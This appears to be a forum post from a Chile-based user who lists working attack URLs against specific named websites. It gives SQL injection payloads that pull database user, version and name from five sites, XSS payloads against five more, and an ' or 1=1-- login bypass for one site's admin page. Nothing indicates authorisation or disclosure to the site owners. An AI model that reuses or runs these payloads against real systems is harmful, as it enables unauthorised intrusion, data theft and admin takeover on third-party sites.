andystefano
User (Chile)
Vulnerable to SQL injection:
http://www.aricasurf.cl/noti.php?id=457+and+1=-1+UNION+SELECT+1,2,3,4,5,6,7,version%28%29,9--
http://www.laligua.cl/noti01.php?id=37+and+1=0+union+select+all+1,2,3,concat_ws(0x3A,user(),version(),database())+--+
http://www.movistararena.cl/not.php?id=78+and+1=-1+UNION+SELECT+1,2,3,4,5,6,7--
http://www.iglesia.cl/valparaiso/admin/mostrar_news.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,version%28%29,12,13,14--
http://www.elfinanciero.cl/ver_detallecursos.php?recordID=367+and+1=0+union+select+all+1,2,3,concat_ws(0x3A,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15+--+

XSS:
http://www.servipag.com/browse.asp?pagina=web/msgerror.htm&mensaje_error=%3C/a%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
http://www.bathstudent.com/404/?url=%3Ch1%3E%3C/a%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
http://dl.nin.com/theslip/confirmation?token=B61LbT12%22%3E%3Cscript%3Ealert%28/xss/.source%29%3C/script%3E%3Cq%20a=%22
http://www.barragantv.net:80/videos.php?pag=1<ScRiPt%20%0a%0d>alert(0)%3B</ScRiPt>
http://www.bibliodrogas.cl/biblioteca/web/resultados2.php?pag=1&solo_digital=&Buscar_Por=03&Fin_Consulta=&sec_busqueda=382758&sec_canasto=0&accion=.&FILTRO=%28+DESCRIPTORES+like+%27%25\&Txt_Busqueda=%22%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E

Bypass:
http://www.novovision.cl/admin/
user ' or 1=1--
pass ' or 1=1--

Check out my other posts!! Later on I will create a post about security!!!!